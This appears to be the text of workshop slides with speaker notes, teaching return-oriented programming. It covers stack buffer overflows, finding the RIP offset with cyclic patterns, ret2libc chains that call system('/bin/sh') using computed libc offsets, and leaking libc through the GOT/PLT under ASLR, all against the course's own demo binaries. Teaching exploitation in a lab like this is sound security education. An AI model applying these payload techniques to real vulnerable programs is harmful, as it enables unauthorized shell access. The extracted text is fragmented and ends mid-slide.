IntroToROP_detailed
IntroToROP_detailed
Introduction to ROP
chiliz
Folie 2
whoami
• Lisa / chiliz
• Student in Automation and Mechatronics (HFU Tuttlingen, Germany)
• Bachelor Thesis at Bosch (Automated Security Testing & Fuzzing)
• CTF Player
• Blackhoodie Attendee in Luxembourg and at Troopers,
Trainer in Berlin
2
Folie 3
Agenda
• Recap Buffer Overflow
• What is ROP and why do we want it?
This set of slides is meant to be an „offline version“ of the course, so you can read up and
redo exercises.
I will describe the workflow in the debuggers/terminals as detailed as possible.
Grey text shows additional/background information (you might know these already, but if
not, it can be helpful)
Folie 4
Important registers:
• RIP: Instruction Pointer
• RSP: Top of the current Stack
Before we get started a few notes on the 64 bit calling convention of Linux.
The arguments of a function call get stored in the registers RDI, RSI, RDX and so on in exactly
this order.
The return value of a function gets stored in rax.
RIP is the instruction pointer register, and RSP is the current top of the stack.
Folie 5
• Call to function
• save return address on the stack to return to it later
• Function gets executed
• return to the address that is saved to the stack
To get more concrete, a function call with 2 argument has always the same procedure.
We move the second argument of the function in RSI.
Then we move the first argument in RDI.
Then the function gets called.
With every subroutine call the current instruction pointer gets stored on the stack, so we can
return to this location after the call
The function gets executed.
After the function is finished we return to the address that was saved on the stack.
Execution continues at the location after the call, the function argument is stored in RAX.
Folie 6
RDI …
0x7FFFFF…
RSI
6
The program takes input from the user as a command line argument .
That input gets passed to a vulnerable function.
That vuln function copies the input to a local buffer.
Remember, local variables are stored on the stack.
We can give the program more characters than the buffer is long.
The buffer will be overflown.
Thats a classic Stack Buffer overflow condition.
Lets go through it step by step.
In the middle you see the compiled assembly code, on the right side I have a sketch of the
current stack and below the registers RDI and RSI which hold the arguments for function calls
in 64 bit.
Folie 7
RDI …
ptr to argv[1]
0x7FFFFF…
RSI
7
Lets start the execution just before the call to the vuln function.
RIP is the instruction pointer register. In reality it always holds the value of the next
instruction that will get executed.
Programs can be stepped through like a movie, executing each instruction after another in a
debugger.
The instruction Pointer RIP will tell the program what to execute next.
For convenience in my diagrams the red RIP pointer always points to the instruction that just
has been executed.
In my diagrams RIP has only the task to show the execution flow. I wanted to avoid
complicated, bulky in future sentences while explaining each instruction after another.
It does not change anything, it is just a convention I chose for the diagrams.
In C, the main function gets 2 arguments: argc and argv. Argc is the argumentcounter, argv is
a char array that holds the arguments. Argv[0] is always the name of the program itself.
argv[1] is the first command line argument, in our case that is the input from the user.
I left out the part where the pointer to argv[1] gets stored in rax, it is not important for us.
We only need to know that at the start of this program, a pointer to argv[1] is stored in rax.
We start the execution at the beginning of the main function. In the diagram, RIP points to
„mov rdi, rax“, so this just got executed.
The pointer to argv[1] holds the input from the user.
Here we see that the pointer to argv, thats the input from the user stored in rax, just got
moved to RDI.
Folie 8
RDI …
ptr to argv[1]
0x7FFFFF…
RSI
8
RDI …
ptr to input (argv[1])
0x7FFFFF…
RSI
9
We enter the vuln function and the first thing we do is to save the base pointer RBP to the
stack.
This is part of the function prologue of the vuln function.
Folie 10
RDI …
ptr to input (argv[1])
0x7FFFFF…
RSI
10
We reserve space on the stack for the buffer by subtracting 32 from the stackpointer.
Folie 11
RDI …
ptr to input (argv[1])
0x7FFFFFFF
RSI ptr to input
1
Next the arguments for the call to strcpy get stored in RDI and RSI. The second argument for
strcpy, input, gets stored in RSI.
Folie 12
RDI …
ptr to buffer
0x7FFFFF…
RSI ptr to input
2
Then the first argument of strcpy, the pointer to our buffer, gets stored in RDI.
This is the 64 bit calling convention: The first argument of a functioncall, here buffer, gets
stored in RDI.
The second argument of that functioncall, here input, gets stored in RSI.
Folie 13
Program call:
> ./myprogram AAA… (31*A)
RDI …
ptr to buffer
0x7FFFFF…
RSI ptr to input
3
When strcpy is executed, the input string is copied into the buffer.
This is where it gets interesting.
Program call:
> ./myprogram AAA… (31*A)
RDI …
ptr to buffer
0x7FFFFF…
RSI ptr to input
4
We see that when strcpy is executed, the input string (31 A) is copied into the buffer.
Strcpy copies until it reaches a Nullbyte, and it also copies this Nullbyte.
When we give a command line argument, a Nullbyte is automatically attached by the
terminal.
Program call:
> ./myprogram AAA… (56*A)
RDI …
ptr to buffer
0x7FFFFF…
RSI ptr to input
5
Program call:
> ./myprogram AAA… (56*A)
Recap Buffer Overflow ! Buffer Overflow, we have 32 bytes and write 56 bytes
0x0000…
RSP buffer
void vuln(char *input) vuln(char*) : (Top of Stack) AAAAAAAA
{ push rbp
char buffer[32]; mov rbp, rsp AAAAAAAA
strcpy(buffer, input); sub rsp, 32
} mov rsi, rdi ; input AAAAAAAA
lea rax, [rbp-32]
int main(int argc, char **argv) mov rdi, rax ;buffer AAAAAAAA
{ call strcpy RIP Saved RBP AAAAAAAA
vuln(argv[1]); leave
} ret Saved RIP AAAAAAAA
AAAAAAAA
RDI …
ptr to buffer
0x7FFFFF…
RSI ptr to input
6
If the input string is longer than the buffer, strcpy will write beyond the border of the buffer.
In this case, strcpy will overwrite also the saved base pointer, saved instruction pointer and
maybe more.
We have stored this saved instruction pointer to get it back after the vulnerable function is
finished.
This means it will get used as an instruction pointer again, but now we can control it.
Folie 17
…
0x7FFFFF…
We basically can overwrite the instruction pointer with everything that we want.
One possibility to exploit this situation is to write shellcode into the buffer instead of As.
At the position where the saved Instruction pointer is stored we insert the address of the
buffer which is the start of our shellcode.
We basically overwrite RIP with the address of our shellcode.
Folie 18
Leave: Ret: …
mov rsp, rbp "pop rip" 0x7FFFFF…
pop rbp
8
Leave restores the stackpointer and the basepointer back to its original positions.
It is part of the function epilogue which deconstructs the stackframe of the vuln function.
The next instruction that will be executed is the return instruction.
This instruction will play an important role for return oriented programming.
It basically pops the next value from the stack and writes it into RIP so that execution
continues at the popped address.
Folie 19
Leave: Ret: …
mov rsp, rbp "pop rip" 0x7FFFFF…
pop rbp
9
In our case this will cause RIP to point to the buffer and changes the control flow to execute
our shellcode. After the shellcode is executed, we get a shell and are done!
To verify ASLR has been disabled, you can print the value of tee
/proc/sys/kernel/randomize_va_space
If it is a 0, it has been disabled.
> cat /proc/sys/kernel/randomize_va_space
> ./01_demo_64_bit
Give me the Code:
AAAA
You gave me: AAAA
When we look at the source code again, the data buffer is 20 bytes long, but we read
much more than that, 0x40, which is 64 byte.
This is a buffer overflow.
Lets verify that by writing more than 20 characters. Lets run it.
> ./01_demo_64_bit
Give me the Code:
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Segmentation fault (core dumped)
We get a segmentation fault. This means that the program tries to access memory thats
not accessible. We can actually see that in gdb.
What you can see is the peda extension for gdb. It gives a nice overview of the current
state of the program.
On the top you can see all the registers and their current values, In the middle you see the
assembly code that is executed. The arrow shows which instruction is about to get
executed.
At the bottom you can see the current stack . In a 64 Bit Binary, each line represents 8
Byte of the stack. The first line is the top of the stack.
We can see the program received a SIGSEG, the signal for segmentation fault.
This indicates the program tried to access memory that it has no rights to access.
We also see that the program crashes during the return statement. The return
takes the top of the stack and loads it into the Instruction Pointer.
The top of the stack is our „A“, means 0x4141…
We can see the memory contents of addresses or registers with the x command.
The RSP register is shown in the register overview, but it resolves our string.
With the peda command vmmap you can see all the mapped memory sections.
(If you only have gdb and not an extension like gdb-peda, you can use the command "info
proc mappings").
$gdb-peda vmmap
0x41 is not included in anyone of them.
The program tries to access memory at this address: (0x4141.. ) and gets a segmentation
fault because it actually has no right to access this memory.
Now the only thing that prevents us from taking control is that the value at the top of the
stack was not a valid address.
The interesting question is, can we set it to an exact value? To do that, we have to know how
many Bytes we have to write until we overwrite the instruction pointer.
To be a bit more clear: how many As do i have to write, before the top of the stack would be
only 8 Bs? I could do this by just trying numbers out, but thats not very efficient. Another
idea is to try calculating from the program. There are two problems with this approach: First,
the space that gets reserved on the stack for the buffer is not necessary the exact size in the
source code. There likely is padding, and also it is dependent from the compiler.
The second problem is, that in bigger functions there are likely operations on the stack
between the bufferoverflow (here the read function, or strcpy) until we reach the return
statement. We would have to calculate them all back.
A safer and more efficient way to do this is to use a pattern.
Folie 20
AAAAAAAA
RDI …
ptr to buffer
0x7FFFFF…
RSI ptr to input
10
This is our current state. Instead of As we now want to overwrite RIP with an exact value.
For this we have to know, how many bytes we have to write until we reach the instruction
pointer.
We can do this by using patterns.
Folie 21
Program call:
> ./myprogram AAAAAAAAABBBBBBBBCCCCCCCC…
AAAAAAAA
RDI …
ptr to buffer
0x7FFFFF…
RSI ptr to input
1
Program call:
> ./myprogram AAAAAAAAABBBBBBBBCCCCCCCC…
DDDDDDD
GGGGGGGG
…
0x7FFFFF…
Program call:
> ./myprogram AAAAAAAAABBBBBBBBCCCCCCCC…
RIP DDDDDDD
Fill-buff
Saved RBP EEEEEEEE
Fill-buff = 8*"A" + 8 * "B" + 8*"C" + 8 * "D" + 8*"E"
= 40 Bytes RIP Saved RIP FFFFFFFF
GGGGGGGG
…
0x7FFFFF…
We need to add up all the characters before the Fs, then we have the exact value how many
bytes we need to overwrite until we overwrite the saved instruction pointer.
Here it makes 40 Bytes in total.
Folie 24
Program call:
> ./myprogram AA…(A*40)FFFFFFFF
! Buffer Overflow, RIP is now FFFFFFFF
Patterns - RIP control
0x0000…
RSP buffer
How many bytes do we have to write until we reach RIP? (Top of Stack) AAAAAAAA
AAAAAAAA
AAAAAAAA
RDI …
ptr to buffer
0x7FFFFF…
RSI ptr to input
4
To set RIP to an exact value, we can now write 40 Bytes and then the value for the instruction
pointer.
However this still feels very manual.
Folie 25
…
0x7FFFFF…
A cyclic pattern aims to create uniq sequences of characters. This can be used to find specific
locations inside the sequence.
We give the pattern option only a length of the pattern, then the pattern is created. The
cyclic pattern that is created is always the same.
Folie 26
bAA1AAGA
…
0x7FFFFF…
We see that now the Instruction Pointer is overwritten with a uniq sequence of characters.
Folie 27
AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGA …
AA0AAFAA 0x7FFFFF…
We can now look for this uniq sequence that overwrote RIP. Gdb peda does this for us using
pattern matching.
Peda takes the pattern that it created and the part of the pattern that we give to it.
Folie 28
AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGA …
AA0AAFAA
0x7FFFFF…
AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGA …
AA0AAFAA
0x7FFFFF…
Match!
Offset: 40 9
Folie 30
AA0AAFAA
AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGA …
0x7FFFFF…
Match!
Offset: 40 10
When peda finds the uniq sequence in the cyclic pattern, it will give us the offset until the
uniq sequence.
This is exactly what we want.
A number of bytes until we reach the instruction pointer that currently is the uniq sequence.
$gdb-peda vmmap
(If you don’t see all memory sections, you need to run the program and break the
execution
- Either set a breakpoint in main and then run (b main, run) or
- Run the program and press ctrl + c to stop at any point (run, ctrl + c )
The nearly bottom line shows the section of the stack and the 3rd column contains the
access permissions.
We have read and write permissions, but we don’t have execute permissions.
So when we write shellcode to it, we cant execute it.
If you look closely, there is no section that has both write and execute permissions.
That is the security mechanism, which has many different names, for instance “data
execution prevention” (DEP), or NX, for No execution.
This is where ROP comes into play.
Folie 31
Code Reuse
#include <stdio.h>
void win()
{
printf("Congratulations!\n");
execve("/bin/sh" ..);
}
int main()
{
char buffer[20];
printf("Enter some text:\n");
scanf("%s", buffer);
return 0;
}
Imagine we have this little program. Even with a non-executable stack we could jump to the
win function and get a shell.
In this case, the win function would do the exact same thing as our shellcode. So we can just
reuse this code that is already in the binary and can be executed.
Folie 34
Code Reuse
#include <stdio.h> What can we do when there is no win function?
void win()
{
printf("Congratulations!\n");
execve("/bin/sh" ..);
}
int main()
{
char buffer[20];
printf("Enter some text:\n");
scanf("%s", buffer);
return 0;
}
Code Reuse
#include <stdio.h> What can we do when there is no win function?
void win()
{ libc (Standard C libray) has always a win function: system
printf("Congratulations!\n");
execve("/bin/sh" ..);
Goal: system("/bin/sh")
}
int main()
{
char buffer[20];
printf("Enter some text:\n");
scanf("%s", buffer);
return 0;
}
Libc (Standard C libray) has always a win function: that is called system.
System will execute whatever we give to it. So when we give the string „bin/sh“ as an
argument to system, we get a shell. So the goal is to call system(„bin/sh“).
Folie 36
The libc is the standard C library, it implements C – standard functions ( like printf,
strcpy..) and POSIX functions (system, wrapper for syscalls)
Under Linux its compiled as shared object (.so) => one of its header files is the famous
stdio.h
libc.so.6 is a symlink to latest libc- version (for example libc-2.28, so the 2.28
is the version number)
You can Find the libc that got linked to the binary with gdb->vmmap or ldd
Path is most often /usr/lib/libc-2.28
Source code can be compiled as either executables or shared objects . Libraries are compiled
to shared objects.
Stdio.h is one of the header files of the libc source code.
Folie 37
Ret2libc
Approach:
• Find Buffer Overflow
• Overwrite with this a stored return address with the address of a
function in the libc (e.g. system)
• The libc function will be executed when the vuln function returns
=> Ret2libc (simple and special case of ROP)
Lets look at the interesting thing for us: how system expects to be called in 64 bit:
Folie 39
We see that for 64 bit the argument, the address to the string /bin/sh gets stored in RDI
before the call to system.
Folie 40
10
Like with every function call, the saved instruction pointer gets pushed to the stack, so after
the function is completed, execution can continue.
Folie 41
Payload strategy
0x0000…
buffer
void vuln(char *input) vuln(char*) :
{ push rbp
char buffer[32]; mov rbp, rsp
strcpy(buffer, input); sub rsp, 32
} mov rsi, rdi ; input
lea rax, [rbp-32]
int main(int argc, char **argv) mov rdi, rax ;buffer ….
{ call strcpy
Saved RBP …
vuln(argv[1]); leave RIP RSP
} ret Saved EIP system
(Top of Stack)
???
Leave: Ret: …
mov rsp, rbp "pop rip" RDI 0x7FFFFF…
???
pop rbp
1
[1] https://www.wired.com/2007/07/weekly-world-ne/
2
Building ROP chains is much like making a blackmail letter out from old newspapers.
For example, if you take this strange newspaper headline „hackers can turn your home
computer into a bomb” and turn it into something that you actually want to say
Folie 43
- Take snippets
from the binary
- glue them together
- get the wanted code
[1] https://www.wired.com/2007/07/weekly-world-ne/
3
- Take snippets
from the binary
- glue them together
- get the wanted code
vuln_binary
mov rax, 1 mov rbx, 2 pop rdi
ret + ret + ret
[1] https://www.wired.com/2007/07/weekly-world-ne/
4
You can see that all the snippets end with a return statement.
Thats the return in return oriented programming, and thats the glue to chain the code
snippets together.
How does that work? Lets look at a quick example:
Folie 45
0x0000…
Building ROP-chains … AAAAAAAA
( „ret“ = pop RIP) RSP
Saved RIP 0x400111
0x400111
mov rax, 1 0x400222
ret 0x400333
0xC0FFEE
0x400222 0x400444
mov rbx, 2 0x7FFF…
ret
RAX
0x400333
pop rdi RBX
ret RDI 5
Lets see how we can put our gadgets into a chain by overflowing the buffer.
On the left you can see the three code snippets from our binary, which all end in a return
statement.
They can be taken from any executable section inside the binary.
Just code from the binary. We refer to them as ROP gadgets.
But remember, we can not write the ROP gadgets ourself, we can only use what is already
there.
On the right side you can see the current stack where our payload already overflowed the
buffer.
As usual, our payload starts with A’s .
This time we have overwritten the saved return Adress with the address of our first gadget in
the chain.
Folie 46
0x0000…
Building ROP-chains … AAAAAAAA
RSP
Saved RIP 0x400111
0x400111
mov rax, 1 0x400222
ret 0x400333
0xC0FFEE
0x400222 0x400444
mov rbx, 2 0x7FFF…
ret
RAX
0x400333
pop rdi RBX
ret RDI 6
When the vulnerable function returns, execution continues at the beginning of the first
gadget.
This will move the value 1 into RAX.
Folie 47
0x0000…
Building ROP-chains … AAAAAAAA
( „ret“ = pop RIP)
Saved RIP 0x400111
0x400111
RSP
mov rax, 1 RIP 0x400222
ret 0x400333
0xC0FFEE
0x400222 0x400444
mov rbx, 2 0x7FFF…
ret
RAX 1
0x400333
pop rdi RBX
ret RDI 7
0x0000…
Building ROP-chains … AAAAAAAA
( „ret“ = pop RIP)
Saved RIP 0x400111
0x400111
mov rax, 1 RSP 0x400222
0xC0FFEE
0x400222 0x400444
mov rbx, 2 0x7FFF…
ret
RAX 1
0x400333
pop rdi RBX
ret RDI 8
That’s super useful for us, because we as an attacker have only control over the stack.
But with a return statement, we also have control over the instruction pointer again!
0x0000…
Building ROP-chains … AAAAAAAA
0xC0FFEE
0x400222 0x400444
mov rbx, 2 RIP 0x7FFF…
ret
RAX 1
0x400333
pop rdi RBX 2
ret RDI 9
0x0000…
Building ROP-chains … AAAAAAAA
( „ret“ = pop RIP)
Saved RIP 0x400111
0x400111
mov rax, 1 0x400222
0xC0FFEE
0x400222 0x400444
mov rbx, 2 0x7FFF…
ret RIP
RAX 1
0x400333
pop rdi RBX 2
ret RDI 10
The return of this gadgets takes the address from the third gadget from the stack and
continues execution there.
As we can see this third gadgets also takes another value from the stack and pops it into RDI
Folie 51
0x0000…
Building ROP-chains … AAAAAAAA
ret 0x400333
0xC0FFEE
RSP
0x400222 0x400444
mov rbx, 2 0x7FFF…
ret
RAX 1
0x400333
pop rdi RIP RBX 2
So it is even possible to provide our gadgets with arguments if they take it from the stack, like
pop instructions.
This is incredible useful, remember in our case we need the address of the string ‘bin/sh’ in
the RDI register.
Where do we get the ROP gadgets from, though? There are tools to find them, for example
ROPgadget or ropper. We can try this on our binary:
We can see there are many gadgets, and all of them end either with a return statement, a
jump or a call. It is a bit strange that we can not see those instructions while disassembling.
Folie 52
x86 – ROPgadget
Why is there code we don‘t see while disassembling?
52
When we run the command ROPgadget, why is there code we don‘t see while
disassembling?
Folie 53
x86 – ROPgadget
Why is there code we don‘t see while disassembling?
push 0x11c35faa
53
When we take for example the following instruction: push that immediate value to the stack,
it translates to the following bytes:
The push instruction for an immediate value is 0x68, and the immediate value is in little
endian.
An interesting fact about the intel architecture is that the instructions do not always have
fixed size, contrary to for example the ARM architecture.
So for example in the intel architecture there are instructions that are only 1 byte long, but
also instructions which are many bytes long.
Also instructions do not have to be aligned in memory, so an instruction can begin at an
arbitrary address.
Folie 54
x86 – ROPgadget
Why is there code we don‘t see while disassembling?
push 0x11c35faa
54
If you would jump with the instruction pointer not at the beginnin at this instruction, but in
the middle of it, it will be interpreted as this:
Folie 55
x86 – ROPgadget
Why is there code we don‘t see while disassembling?
push 0x11c35faa
55
This means that even uninteresting instructions can turn into an interesting ROPGgadget
when they contain the value 0xc3, because that is the opcode for return.
The tool ROPgadget looks for this in an automated way, and this is way we find so many
gadgets we dont see while just looking at the disassembled code.
Folie 56
Payload Strategy
0x0000…
buffer
void vuln(char *input) vuln(char*) :
{ push rbp
char buffer[32]; mov rbp, rsp
strcpy(buffer, input); sub rsp, 32
} mov rsi, rdi ; input
lea rax, [rbp-32]
int main(int argc, char **argv) mov rdi, rax ;buffer ….
{ call strcpy
Saved RBP …
vuln(argv[1]); leave RIP
} ret RSP
(Top of Stack) Saved EIP ptr „pop rdi, ret“
ptr to „/bin/sh“
To get the argument for system into RDI, our first ROP gadget is the pop rdi gadget.
Lets look what happens if we hit the return now, with this state of the stack:
Folie 57
Payload Strategy
0x0000…
buffer
void vuln(char *input) vuln(char*) :
{ push rbp
char buffer[32]; mov rbp, rsp
strcpy(buffer, input); sub rsp, 32
} mov rsi, rdi ; input
lea rax, [rbp-32]
int main(int argc, char **argv) mov rdi, rax ;buffer ….
{ call strcpy
Saved RBP …
vuln(argv[1]); leave
} ret RSP
RIP Saved EIP ptr „pop rdi, ret“
(Top of Stack)
ptr to „/bin/sh“
The Return, as I explained, pops the next value from the stack and loads it into the
instruction pointer register, so execution will continue there. In our case that is the Pop RDI
gadget
Folie 58
Payload Strategy
0x0000…
buffer
void vuln(char *input) ....:
{ ...
char buffer[32]; pop rdi RIP
strcpy(buffer, input); ret
}
ptr to „/bin/sh“
RSP
Leave: Ret: (Top of Stack) ptr to system
mov rsp, rbp "pop rip" RDI 0x7FFFFF…
ptr to „/bin/sh“
pop rbp
4
The pop RDI code snippet pops the next value from the stack into the RDI register.
In this case this is the pointer to bin/sh.
Folie 59
Payload Strategy
0x0000…
buffer
void vuln(char *input) ....:
{ ...
char buffer[32]; pop rdi
strcpy(buffer, input); ret RIP
}
ptr to „/bin/sh“
RSP
Leave: Ret: (Top of Stack) ptr to system
mov rsp, rbp "pop rip" RDI 0x7FFFFF…
ptr to „/bin/sh“
pop rbp
5
When we hit the return of the gadget, it will take the next value on the stack and load it into
the instruction pointer register.
In this case this is system. System expects its argument in the RDI register, which is now the
pointer to /bin/sh
Folie 60
Payload Strategy
0x0000…
buffer
void vuln(char *input) system:
{ ... RIP
char buffer[32];
strcpy(buffer, input);
}
ptr to „/bin/sh“
Now system gets executed, with the string „bin/sh“ as argument, and after this, we get a
shell.
Folie 61
0x7FFF…
If we take all this together, we can now apply this concept to our exercise:
First we have our As to fill up the buffer and overflow until our instruction pointer.
Folie 62
0x7FFF…
Then we have address of our first gadget: thats pop rdi, return.
Folie 63
….
+ address "/bin/sh" [value that gets popped in RDI]
Saved EBP AAAAAAAA
0x7FFF…
Next we put the address of “/bin/sh” , and this will get popped by the first gadget into RDI.
The pop gadget always needs an argument that comes right after it.
So they always come together.
Finally we put the address of system, which is our second and final gadget for now.
Folie 64
….
+ address "/bin/sh" [value that gets popped in RDI]
Saved EBP AAAAAAAA
+ address of system
Saved EIP ptr to„pop RDI“ [ROP-gadget]
ptr to system()
0x7FFF…
10
Now system gets executed, and system takes its argument from RDI, which we just set.
heap
.text
0x00000000 1
We can calculate them like this. We get the absolute address of system when we take the
address of the libc-Base and add the offet to system inside the libc.
The string “bin/sh” is present inside the libc, because some functions use it too.
We also get the address of that “/bin/sh” string by taking the address of the libc base and
add the offside to the string inside the libc.
Folie 66
vmmap absolute address (if ASLR is disabled): absolute address (if ASLR is disabled):
p system searchmem /bin/sh
To determine the address of the libc base and the offsets to system and bin/sh, there are
various ways. There are command line tools like ldd, readelf or strings.
Of course you can always open it in a disassembler like Hopper or IDA to get the same
information.
We will use the command line tools and vmmap for now.
I also included this section in the cheat sheet.
. I prepared a template to create our payload, to get a bit of a logic structure.
(open create_payload.py in the folder of the first demo)
The first XXX we can already fill out: we already determined with the pattern in peda that we
need 40 As until we reach the saved Instruction pointer.
FILLBUF = 40
LIBC_BASE = 0x7ffff7a0d000
The offset to system inside the libc we can get with the command line tool readelf with the
option –s on the libc that is loaded. readelf gives infos about elf files (executable and linking
format), and the –s options stands for symbols.
The path of the libc we get either from ldd or vmmap. It is important we use the libc that the
program uses, so you need to run either ldd or vmmap before you look for this offset.
Because this will get a lot of output, we can search the output with the command “grep” for
system.
This will give us 3 output lines, but the first system is another system (systemerr), and the second and
third line have the same offset.
OFFSET_SYSTEM = 0x45390
Next we determine the offset to the string “/bin/sh” inside the libc.
For this we can use the strings command that shows all the strings in a binary.
The option -tx will show us the offset to the strings in hex.
The path of the libc we get either from ldd or vmmap. Because this will get a lot of output,
we can search the output for the string “/bin/sh” with the grep command.
OFFSET_BIN_SH = 0x18cd57
The third step in the script is to get the address of the ROP gadget “pop rdi, ret”.
We can use the tool ROPgadget for this. With the option --binary we can specify the binary which is
in our case our program 01_demo_64_bit. This produces a lot of output:
We can now determine the absolute address of system by taking the libc base address and add
the offset to system within the libc to it:
address_system = LIBC_BASE + OFFSET_SYSTEM
and the same for the absolute address of the string “/bin/sh”:
address_bin_sh = LIBC_BASE + OFFSET_BIN_SH
The final step for this exercise is to assemble the payload and build the ROP chain.
Can you remember the order the payload needs to be structured?
First we fill up the buffer until we overwrite the return address with 40 As.
Before we call system, we need to put the string “/bin/sh” in the RDI register.
For this we can use the “pop RDI gadget, so we overwrite the saved instruction pointer with
the address of our first ROP gadget.
Addresses in the payload need to be written in little endian. Pwntools has a nice function
built in that does this for us, p64() for pack64 bit.
The “argument” for the “pop rdi” gadget is the string “/bin/sh”, so this needs to go next.
After we have the “bin/sh” string in the RDI register, we want to call system, so the last piece
of our chain is the absolute address of system:
We can now save and run the script, it will print us our assembled payload that we can give
to our program.
However, we don’t get a shell, we get a segmentation fault. Have we done anything wrong?
Lets look at it in gdb. For this it is the easiest to save the payload to a file:
> ./create-payload.py > payload.bin
To examine what went wrong with the exploit, always set a breakpoint at return!!
Because this is the point where you see the payload like it should be on the stack.
If you see that the payload is wrong already, you might have missed something that destroys
your payload that you need to take into account.
If it is like you wanted it to be, you can now debug it step by step to see what is wrong.
To set a breakpoint at the return, you can first disassemble the function with the command
“disas” like following:
You can run the program and give it the payload like this:
gdb-peda$ run < payload.bin
We see that we are at the return statement now, and at the top of the stack we see our rop chain as
we wanted it to be: the “pop rdi” gadget, the address of the string “/bin/sh”, and the address of
system. This looks good. We can now step one instruction further with ni. When we step furthernow,
we see the address of the string “/bin/sh” in RDI and system will get executed (the arrow points to
the first instruction of system).
Our payload works. We can continue now, otherwise we only step through the system function,
which is a very long function. We can continue with the command c:
We see that /bin/dash gets executed. (/bin/sh is just a symlink to the current shell, for ubuntu dash is
the default shell).
The first execution, process 4210 is because we call system, and system internally executes /bin/dash
too.
So the /bin/dash at process 4210 is from system, not our “/bin/sh”.
But we also see that in process 4211 /bin/dash gets executed, but exits immediately.
/bin/dash does not receive anything from stdin and so it exits.
So we get a shell, but because the shell does not receive anything from stdin, it closes immediately.
There is a neat trick with the cat command to avoid this problem. Cat with a dash can hold stdin
open!
You can try this:
> cat payload.bin -
You should be able to still type.
We can use this for our exploit, so that the shell does not close immediately:
> cat payload.bin - | ./01_demo_64_bit
!Attention: To avoid that copying of the offsets is possible, I linked against a different libc.
To run the program, you need to specify the libc that is used and the linker.
Change to the directory of the second exercise (/02_demo/).
You can use the following command to run the program (every “/” is necessary here):
For the address of the libc base you have to use gdb->vmmap this time!
Ldd does not work here.
To run the program in gdb, run following commands:
libc
heap
.text
0x400000
3
Now, the third exercise of the workshop will be with ASLR enabled.
ASLR stands for Address Space Layout Randomization and it is a System wide security
mechanism.
ASLR is turned on per Default on nearly every modern system nowadays.
As we know in our running program we have different sections like the text section, which
contains the code, the heap, shared libraries like the libc and the stack.
With ASLR the base addresses of all those sections are randomized, like this.
All sections start at random addresses now.
Folie 68
0x400000
4
stack
• ASLR: Address Space Layout Randomization
• System wide security mechanism
libc
• Base addresses of each section are
randomized heap
• With each execution of the program
addresses change unpredictable for an
attacker .text
0x400000
5
This will break the exploit of our last two exercises, because we couldnt figure out the base
address of the libc.
What you can also see here is that in this example the text section of our program also got
randomized.
When this is done, this is called „position independent executable“
Folie 70
libc
heap
.text
0x400000
6
If this is enabled, even the addresses of all ROP gadgets change, and this makes exploitation
really hard.
However, PIE is not always enabled for a program, and we can check this with gdb peda for
example.
Folie 71
libc
heap
.text
0x400000
7
If PIE is disabled, the text section always starts at the same address.
To show that this configuration is still relevant, you can try this on some of the standard
utilities of ubuntu16.04, like for example the ping command:
The base address of the libc changes with every execution of the command.
Yet the last 3 nibbles are always zero!
That is because base addresses of sections are always page aligned.
(If you think you have found the libc base address but it doesnt with 3 zeros, you made a
mistake).
Before we start one important note: gdb always simulates that ASLR is disabled!
If your exploit works in gdb, and does not work outside of it, and ASLR is enabled on the
system, that is probably the reason why.
If you want to enable ASLR in gdb, peda provides a command for it: „aslr on“
We see that PIE is disabled. This means that the code sections of the program, the three
sections that are highlighted in black, stay at the same address with every execution of the
program.
All other base addresses of the sections are randomized due to ASLR.
What are the difficulties now? What prevents our last exploit to work in this environment?
- We can overwrite RIP but we don’t know where we want to jump (we dont know where
the libc base is located)
- We want to do the exact same thing but somehow we need to get the libc base address
first
- We know that PIE is disabled, so the addresses inside our binary don’t change
- That means we can still use any gadgets in our program ➔ very good!
- We will see with the gadgets we are able to leak the address of the libc, and that makes
ASLR with PIE disabled kinda broken.
- What we basically want is to build a ROP-chain to leak the address of libc. Maybe we find
a smart way to do this, by looking at what we‘ve got.
We have functions in our program, that are defined in the libc, like printf or read. So the
program has to know where to find them.
The second step is a pretty neat trick we can do: Maybe we find a code snippet that enables
us to trigger the Buffer Overflow again during the same execution.
So we can exploit the same Buffer Overflow a second time. This will become clearer in just a
second. The third step is to Perform the known exploit with the new calculated addresses of
system and /bin/sh.
Let’s look how we would do the second step: triggering the buffer Overflow again.
So the Buffer Overflow happens during the read function, so we could use the addresses
before that to get the Buffer Overflow a second time.
But we have to be careful which one to choose, because the base pointer (RBP) still needs to
be valid at that time.
The easiest way to get a Buffer overflow again is to jump to the point where everything is set
up, usually the beginning of a function, here it is the beginning of the main function.
We succeeded, we could jump back and get the Buffer overflow again.
So step 2 and step 3 should be clear now: I just showed the looping to main to get another
Buffer Overflow, and Step 3, calculating the new addresses of system and “/bin/sh” when we
have the new libc base address is doable too.
So the only part left is the leak and we can explore this now in detail. For this, we will have a
look at the Global Offset Table and Procedure Linkage Table.
Folie 73
0x7FFF…
stack
GOT and PLT
libc
.text
• Every library function that is RIP …
called from inside the binary has call puts@plt
a corresponding entry in those …
tables .plt
puts: jmp [puts@GOT]
read: jmp [read@GOT]
0x400000 10
When the instruction pointer reaches a call to a library function, it does not call directly into
the shared library.
Folie 75
0x7FFF…
stack
GOT and PLT
libc
.text
• Every library function that is …
called from inside the binary has RIP call puts@plt
a corresponding entry in those …
tables .plt
puts: jmp [puts@GOT]
read: jmp [read@GOT]
0x400000 1
As you can see it actually calls into the PLT section at the entry of puts.
Folie 76
0x7FFF…
stack
GOT and PLT
libc
.text
• Every library function that is …
called from inside the binary has call puts@plt
a corresponding entry in those …
tables .plt
RIP puts: jmp [puts@GOT]
read: jmp [read@GOT]
0x400000 2
0x7FFF…
stack
GOT and PLT
libc
.text
• Every library function that is …
called from inside the binary has call puts@plt
a corresponding entry in those …
tables .plt
RIP puts: jmp [puts@GOT]
read: jmp [read@GOT]
0x400000 3
The global offset table contains the absolute addresses of all library functions that are used
inside the binary.
This table is dynamically created at runtime, because these addresses change for every
execution due to ASLR.
Folie 78
0x7FFF…
stack
GOT and PLT
libc
.text
• Every library function that is …
called from inside the binary has call puts@plt
a corresponding entry in those …
tables .plt
